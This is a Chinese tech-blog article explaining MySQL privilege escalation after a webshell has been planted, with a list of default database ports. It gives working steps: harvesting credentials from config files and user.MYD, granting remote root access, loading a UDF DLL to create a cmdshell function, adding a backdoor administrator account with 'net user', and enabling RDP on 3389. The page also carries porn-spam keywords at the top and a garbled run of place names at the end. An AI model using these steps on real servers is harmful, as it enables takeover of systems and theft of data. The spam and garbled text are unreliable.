最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

mysql數(shù)據(jù)庫提權(quán)的三種方法

 更新時間:2024年09月19日 10:22:10   作者:feing.  
文介紹了MySQL數(shù)據(jù)庫的三種提權(quán)方法:UDF提權(quán)、MOF提權(quán)和啟動項提權(quán),同時列出了一些常見數(shù)據(jù)庫及其默認(rèn)端口,下面就來介紹一下,感興趣的可以了解一下

MySql提權(quán)的三種方式:

  • udf提權(quán)
  • mof提權(quán)
  • 啟動項提權(quán)

以下是一些常見的數(shù)據(jù)庫及其默認(rèn)端口:

1. MySQL: 默認(rèn)端口為 3306

2. PostgreSQL: 默認(rèn)端口為 5432

3. Oracle Database: 默認(rèn)端口為 1521

4. Microsoft SQL Server: 默認(rèn)端口為 1433

5. MongoDB: 默認(rèn)端口為 27017

6. Redis: 默認(rèn)端口為 6379

7. Elasticsearch: 默認(rèn)端口為 9200 (HTTP) 和 9300 (內(nèi)部通信)

8. Cassandra: 默認(rèn)端口為 9042

9. SQLite: 通常是本地文件系統(tǒng),沒有固定端口

10. DB2: 默認(rèn)端口為 50000

11.國產(chǎn)的DM達(dá)夢數(shù)據(jù)庫, 默認(rèn)端口號為:5236;

mysql_UDF 提權(quán):

拿到webshell之后,進(jìn)行數(shù)據(jù)庫提權(quán)操作

一、端口掃描

二、信息收集:

如何獲取mysql賬號密碼

1.查看網(wǎng)站配置文件。

如:conn、config、data、sql、common 、inc、include等。

2.Mysql配置文件:C:\phpStudy\MySQL\data\mysql\user.MYD

例如:DVWA默認(rèn)數(shù)據(jù)庫存儲在:C:/phpStudy/WWW/DVWA/config/config.inc.php.dist目錄

點擊查看:賬號:root 密碼:root

查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

放到MD5在線網(wǎng)站進(jìn)行解密

三、提權(quán)利用

注意事項:提權(quán)的第一步要知道數(shù)據(jù)庫的版本號:

(1)如果mysql<5.1    導(dǎo)出目錄 c:\windows 或  c:\windows\system32

(2)mysql=>5.1   導(dǎo)出安裝目錄\MySQL\lib\plugin

注*:默認(rèn)mysql不能遠(yuǎn)程連接,需要用菜刀進(jìn)行本地連接

選擇mysql,填寫好賬號:root 密碼root,確認(rèn)好提交進(jìn)行連接

設(shè)置遠(yuǎn)程連接,用于在本地連接。

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges; 重新加載權(quán)限數(shù)據(jù)

數(shù)據(jù)庫版本為5.5.53

由于本次實驗數(shù)據(jù)庫為5.5.53,因此選擇\MySQL\lib\plugin目錄。

提示報錯

前提條件為:secure_file_priv等于空,需要在my.ini配置文件中進(jìn)行設(shè)置

修改之后,查看安裝dll文件完成。

創(chuàng)建cmdshell函數(shù),執(zhí)行操作系統(tǒng)命令。

Create Function cmdshell returns string soname 'udf.dll';

使用cmdshll函數(shù)執(zhí)行操作系統(tǒng)命令

select cmdshell('whoami');
select cmdshell('net user 123 123/add');    添加用戶
select cmdshell('net localgroup administrators 123 /add');    將123用戶添加到管理組

開3389進(jìn)行遠(yuǎn)程連接

Create Function open3389 returns string soname 'udf.dll';
select open3389();    開啟3389遠(yuǎn)程連接

注意:僅用于技術(shù)討論,切勿用于其他用途,一切后果與本人無關(guān)。

到此這篇關(guān)于mysql數(shù)據(jù)庫提權(quán)的三種方法的文章就介紹到這了,更多相關(guān)mysql數(shù)據(jù)庫提權(quán)內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • MySQL主從同步診斷show?slave?status?卡住的深度排查與解決方案(最新推薦)

    MySQL主從同步診斷show?slave?status?卡住的深度排查與解決方案(最新推薦)

    在?MySQL主從架構(gòu)的日常運維中,show?slave?status是監(jiān)控同步狀態(tài)的核心命令,本文結(jié)合源碼分析與調(diào)試實踐,揭示其背后的鎖競爭機制,并提供系統(tǒng)性的排查與優(yōu)化方案,感興趣的朋友一起看看吧
    2025-06-06
  • MySQL字符集utf8修改為utf8mb4的方法步驟

    MySQL字符集utf8修改為utf8mb4的方法步驟

    這篇文章主要給大家介紹了關(guān)于MySQL字符集utf8修改為utf8mb4的方法步驟,文中通過示例代碼介紹的非常詳細(xì),對大家學(xué)習(xí)或者使用MySQL具有一定的參考學(xué)習(xí)價值,需要的朋友們下面來一起學(xué)習(xí)學(xué)習(xí)吧
    2019-07-07
  • 詳解Mysql日期格式并聚合統(tǒng)計示例

    詳解Mysql日期格式并聚合統(tǒng)計示例

    這篇文章主要為大家介紹了Mysql日期格式并聚合統(tǒng)計示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-04-04
  • 解決mysql 1040錯誤Too many connections的方法

    解決mysql 1040錯誤Too many connections的方法

    因為你的mysql安裝目錄下的my.ini中設(shè)定的并發(fā)連接數(shù)太少或者系統(tǒng)繁忙導(dǎo)致連接數(shù)被占滿
    2012-09-09
  • MySQL數(shù)據(jù)表分區(qū)技術(shù)PARTITION詳解

    MySQL數(shù)據(jù)表分區(qū)技術(shù)PARTITION詳解

    在處理大規(guī)模數(shù)據(jù)時,數(shù)據(jù)庫性能的優(yōu)化變得尤為重要,MySQL提供了一種稱為“分區(qū)”(Partitioning)的技術(shù),可以顯著提高查詢效率和管理大型數(shù)據(jù)庫表的能力,本文將詳細(xì)介紹MySQL中的數(shù)據(jù)表分區(qū)技術(shù),包括其基本概念、類型以及如何實現(xiàn)和維護(hù),需要的朋友可以參考下
    2025-02-02
  • MySQL中空值和NULL的區(qū)別小結(jié)

    MySQL中空值和NULL的區(qū)別小結(jié)

    在 MySQL 中,NULL 值和空值是兩個不同的概念,本文主要介紹了MySQL中空值和NULL的區(qū)別小結(jié),具有一定的參考價值,感興趣的可以了解一下
    2024-08-08
  • MySQL死鎖的產(chǎn)生原因以及解決方案

    MySQL死鎖的產(chǎn)生原因以及解決方案

    這篇文章主要介紹了MySQL死鎖的產(chǎn)生原因以及解決方案,幫助大家更好的維護(hù)數(shù)據(jù)庫,感興趣的朋友可以了解下
    2020-09-09
  • gearman + mysql方式實現(xiàn)持久化操作示例

    gearman + mysql方式實現(xiàn)持久化操作示例

    這篇文章主要介紹了gearman + mysql方式實現(xiàn)持久化操作,簡單描述了持久化的概念、原理,并結(jié)合實例形式分析了gearman + mysql持久化操作相關(guān)實現(xiàn)技巧,需要的朋友可以參考下
    2020-02-02
  • Ubuntu下啟動、停止、重啟MySQL,查看錯誤日志命令大全

    Ubuntu下啟動、停止、重啟MySQL,查看錯誤日志命令大全

    這篇文章主要介紹了Ubuntu下啟動、停止、重啟MySQL,查看錯誤日志命令大全,需要的朋友可以參考下
    2014-06-06
  • mysql實現(xiàn)多表關(guān)聯(lián)統(tǒng)計(子查詢統(tǒng)計)示例

    mysql實現(xiàn)多表關(guān)聯(lián)統(tǒng)計(子查詢統(tǒng)計)示例

    這篇文章主要介紹了mysql實現(xiàn)多表關(guān)聯(lián)統(tǒng)計(子查詢統(tǒng)計),結(jié)合具體案例形式分析了mysql多表關(guān)聯(lián)統(tǒng)計的原理、實現(xiàn)方法及相關(guān)操作注意事項,需要的朋友可以參考下
    2019-10-10

最新評論

治多县| 五寨县| 杂多县| 炉霍县| 西充县| 塘沽区| 巴彦县| 鄂托克前旗| 林周县| 长葛市| 基隆市| 双江| 尼木县| 新巴尔虎右旗| 偃师市| 临夏县| 十堰市| 葵青区| 长乐市| 金堂县| 绿春县| 微山县| 巴彦淖尔市| 剑阁县| 德兴市| 吉安市| 纳雍县| 比如县| 拜泉县| 乐山市| 斗六市| 天等县| 壤塘县| 北川| 邯郸县| 蒙山县| 临沧市| 普定县| 天祝| SHOW| 洮南市|